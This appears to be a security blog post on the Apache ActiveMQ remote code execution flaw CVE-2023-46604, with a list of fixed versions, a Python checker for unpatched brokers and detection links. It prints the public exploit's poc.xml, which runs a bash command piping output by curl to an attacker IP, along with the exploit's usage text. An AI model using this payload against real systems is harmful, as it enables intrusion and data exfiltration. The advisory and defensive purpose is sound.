Last week a new exploit was published against Apache ActiveMQ, one of the most widely used message brokers. As Wikipedia says,
Apache ActiveMQ is an open source message broker written in Java together with a full Java Message Service (JMS) client.
The impact is huge: remote code execution with the privileges of the ActiveMQ (Apache) process.
If your organization is not running one of the following fixed versions, you are in big trouble:
ActiveMQ Classic:
6.0.0
5.18.3
5.17.6
5.16.7 (last release from this branch)
5.15.16 (last release from this branch)
ActiveMQ Artemis:
2.31.2
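To turn the list above into a check you can run over a broker inventory, here is an added Python example (not from the original post or from the ActiveMQ project) that compares a reported version with the fix release of its branch. It assumes that later patch releases on a fixed branch, and branches newer than the listed ones, also carry the fix, and that older branches with no fix release are vulnerable; the hostnames are constructed placeholders.

```python
import re

# Fix releases from the list above: (major, minor) branch -> first patched patch level.
FIXED = {
    "classic": {(5, 15): 16, (5, 16): 7, (5, 17): 6, (5, 18): 3, (6, 0): 0},
    "artemis": {(2, 31): 2},
}

def parse_version(text):
    """Turn '5.18.2' or '5.16.7-SNAPSHOT' into a (major, minor, patch) tuple."""
    m = re.match(r"\s*(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        raise ValueError(f"unrecognised ActiveMQ version: {text!r}")
    return int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)

def is_patched(product, version):
    """True when the build carries the CVE-2023-46604 fix.

    product is 'classic' or 'artemis'. Assumption: any later patch release on a
    fixed branch, and any branch newer than the newest listed one, also has the
    fix; older branches that never received a fix release are vulnerable.
    """
    table = FIXED[product]
    major, minor, patch = parse_version(version)
    branch = (major, minor)
    if branch in table:
        return patch >= table[branch]
    same_major = [b for b in table if b[0] == major]
    if same_major:
        return branch > max(same_major)
    return major > max(b[0] for b in table)

def vulnerable_brokers(inventory):
    """Filter an inventory of (host, product, version) down to unpatched entries."""
    return [(host, product, version)
            for host, product, version in inventory
            if not is_patched(product, version)]

# Constructed sample inventory with placeholder hostnames, not real systems.
SAMPLE_INVENTORY = [
    ("mq-prod-01.example.internal", "classic", "5.18.3"),
    ("mq-prod-02.example.internal", "classic", "5.18.2"),
    ("mq-legacy.example.internal", "classic", "5.14.5"),
    ("artemis-01.example.internal", "artemis", "2.31.2"),
    ("artemis-02.example.internal", "artemis", "2.30.0"),
]

if __name__ == "__main__":
    for host, product, version in vulnerable_brokers(SAMPLE_INVENTORY):
        print(f"{host}: ActiveMQ {product} {version} needs the CVE-2023-46604 fix")
```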
There are already a bunch of public exploits. You can have a look at one here: https://github.com/duck-sec/CVE-2023-46604-ActiveMQ-RCE-pseudoshell
In that exploit the payload is delivered through poc.xml. As the file below shows, the problem is a lack of input validation: the server loads the Spring bean definition it is handed and runs whatever system command is passed as the constructor arguments of the bean:
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
            <list>
                <value>bash</value>
                <value>-c</value>
                <value>ls -lah | awk '{print $0";"}' | curl -X POST -d @- http://10.10.14.59:8181/receive_data</value>
            </list>
        </constructor-arg>
    </bean>
</beans>
Using the exploit is simple:
usage: exploit.py [-h] -i IP [-p PORT] -si SRVIP [-sp SRVPORT]
optional arguments:
-h, --help show this help message and exit
-i IP, --ip IP ActiveMQ Server IP or Hostname
-p PORT, --port PORT ActiveMQ Server Port, defaults to 61616
-si SRVIP, --srvip SRVIP
Serve IP
-sp SRVPORT, --srvport SRVPORT
Serve port, defaults to 8080
Here IP and PORT identify the vulnerable ActiveMQ server, and SRVIP and SRVPORT are your public IP address and port hosting the payload (poc.xml).
Also, if you run nuclei in your organization, there is already a template that checks for this vulnerability:
https://github.com/projectdiscovery/nuclei-templates/blob/48f2cd1b3ecf5963be495947e2e594e599e39d1f/network/cves/2023/CVE-2023-46604.yaml
More info: